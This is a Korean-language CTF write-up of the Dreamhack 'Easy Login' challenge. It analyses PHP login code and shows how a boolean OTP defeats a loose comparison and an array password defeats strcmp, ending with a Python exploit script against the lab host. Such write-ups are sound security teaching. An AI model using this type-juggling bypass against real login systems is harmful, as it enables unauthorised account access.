[Dreamhack] Level 1: Easy Login

CTF, War game

[Dreamhack] Level 1: Easy Login

mnzy🌱 2024. 6. 20. 05:40

1. 문제

https://dreamhack.io/wargame/challenges/1213

easy-login

Description 관리자로 로그인하여 플래그를 획득하세요! 플래그 형식은 DH{...} 입니다.

dreamhack.io

2. 해결 과정

(1) 문제 페이지 접속

- 아이디 / 패스워드 / OTP 입력

- admin으로 로그인해야 하므로, 패스워드와 OTP 부분을 찾거나 우회해서 로그인에 성공해야 한다.

(2) 코드 분석

- index.php

generatePassword 함수는 16진수 문자(0-9, a-f)로 구성된 지정된 길이의 임의 비밀번호를 생성한다.
generateOTP 함수는 'P'로 시작하는 6자리의 숫자 OTP를 생성한다
admin_pw와 otp는 각각 32자리 비밀번호와 OTP를 저장한다.

<?php

function generatePassword($length) {
    $characters = '0123456789abcdef';
    $charactersLength = strlen($characters);
    $pw = '';
    for ($i = 0; $i < $length; $i++) {
        $pw .= $characters[random_int(0, $charactersLength - 1)];
    }
    return $pw;
}

function generateOTP() {
    return 'P' . str_pad(strval(random_int(0, 999999)), 6, "0", STR_PAD_LEFT);
}

$admin_pw = generatePassword(32);
$otp = generateOTP();

...

- 로그인 함수

login 함수는 사용자가 제출한 자격 증명(cred)을 확인하고 유효성을 검사한다.
cred은 base64로 인코딩되어 있으며, 이를 디코드하고 JSON으로 변환하여 검사한다.
cred에는 id, pw, otp가 있어야 하며, 이 중 하나라도 누락되면 "Cred error"를 반환한다.
id가 admin이 아니면 hello ~ 를 출력한다.
id가 'admin'이어야 하고, otp가 생성된 otp와 일치하고, 비밀번호가 admin_pw와 일치하면 플래그를 출력한다.

function login() {
    if (!isset($_POST['cred'])) {
        echo "Please login...";
        return;
    }

    if (!($cred = base64_decode($_POST['cred']))) {
        echo "Cred error";
        return;
    }

    if (!($cred = json_decode($cred, true))) {
        echo "Cred error";
        return;
    }

    if (!(isset($cred['id']) && isset($cred['pw']) && isset($cred['otp']))) {
        echo "Cred error";
        return;
    }

    if ($cred['id'] != 'admin') {
        echo "Hello," . $cred['id'];
        return;
    }
    
    if ($cred['otp'] != $GLOBALS['otp']) {
        echo "OTP fail";
        return;
    }

    if (!strcmp($cred['pw'], $GLOBALS['admin_pw'])) {
        require_once('flag.php');
        echo "Hello, admin! get the flag: " . $flag;
        return;
    }

    echo "Password fail";
    return;
}

?>

브루트 포스를 통해서 비밀번호와 otp 값을 알아내려고 했지만,

세션에 해당 값이 저장되는 것이 아니므로 시도할 때마다 새로운 패스워드와 otp 값이 생성되므로 불가능하다.

따라서 패스워드 입력과 otp입력을 우회해야 한다.

https://www.php.net/manual/en/types.comparisons.php

PHP: PHP type comparison tables - Manual

Some function to write out your own comparisson table in tsv format. Can be easily modified to add more testcases and/or binary functions. It will test all comparables against each other with all functions. '==', 'ne' => '!=', 'gt' => '>', 'lt' => '<', 'ne

www.php.net

위의 링크를 통해서 PHP의 비교연산에 대한 우회법을 알아낼 수 있다.

PHP에서는 문자열을 비교할 때 자동으로 타입 변환이 이루어진다.

따라서 특정 값들을 비교할 때 예상치 못한 결과가 나올 수 있다.

코드를 보면 OTP는 != 를 통해서 비교를 하고 있다.

즉, loose 비교를 진행하고 있으므로 값만 비교하고 있으며 타입이 다르면 형변환을 진행하기 때문에, 이를 이용해서 otp 검사를 우회할 수 있다.

generateOTP 함수는 strval 함수를 통해 정수를 문자열로 변환하기 때문에, OTP의 값은 문자열이다.

따라서 만약 입력값을 문자열로 주지 않고, true값(boolean)이 반환되도록 하면 php는 이를 동일하다고 판단할 것이다.

   if ($cred['otp'] != $GLOBALS['otp']) {
        echo "OTP fail";
        return;
    }

또한, pw값은 strcmp함수를 통해 비교를 진행하고 있다.

strcmp함수는 인자값으로 string이 들어오지 않을 때 null(false)를 반환하는 취약점을 가지고 있다.

따라서, 배열값으로 패스워드값을 주어서 !null을 발생시켜 true가 리턴되도록 우회할 수 있다.

    if (!strcmp($cred['pw'], $GLOBALS['admin_pw'])) {
        require_once('flag.php');
        echo "Hello, admin! get the flag: " . $flag;
        return;
    }

익스플로잇 코드

import requests
import json
import base64

# URL
url = 'http://host3.dreamhack.games:10839/'

# 입력
cred = {
    'id': 'admin',
    'pw': [],
    'otp': True  
}

# JSON -> base64 인코딩
cred_encoded = base64.b64encode(json.dumps(cred).encode()).decode()

# POST
post_data = {
    'cred': cred_encoded
}

# 요청
response = requests.post(url, data=post_data)

# 응답 
print(response.text)